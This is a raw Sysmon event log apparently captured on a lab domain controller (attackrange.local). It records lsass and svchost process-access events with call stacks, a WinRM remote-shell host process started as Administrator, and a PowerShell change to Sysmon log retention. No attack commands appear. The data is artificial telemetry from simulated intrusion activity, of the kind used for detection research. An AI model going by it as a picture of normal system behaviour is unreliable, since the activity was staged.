08:40:27.399{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000427Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000426Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-14FE-5F84-0500-000000007E01}6401148C:\Windows\system32\csrss.exe{5D479F2C-167B-5F84-0E03-000000007E01}5084C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000425Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-167B-5F84-0E03-000000007E01}5084C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000424Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.413{5D479F2C-167B-5F84-0E03-000000007E01}5084C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-167B-5F84-41E1-110000000000}0x11e1410HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-1506-5F84-0C00-000000007E01}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000423Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000422Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000421Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000420Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.368{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000419Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.368{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000418Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.368{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000417Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.352{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000416Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.352{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000415Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.352{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 13241300x8000000000000000414Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-SetValue2020-10-12 08:40:27.274{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000) 10341000x8000000000000000413Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.009{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000412Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.009{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000411Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.009{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000611Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.321{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000610Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.321{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000609Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.321{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.149{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167C-5F84-1903-000000007E01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000607Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.149{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167C-5F84-1903-000000007E01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000606Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.118{5D479F2C-167C-5F84-1903-000000007E01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2wmevcce.a5x.ps12020-10-12 08:40:28.118 10341000x8000000000000000605Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.103{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-167C-5F84-1903-000000007E01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000604Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 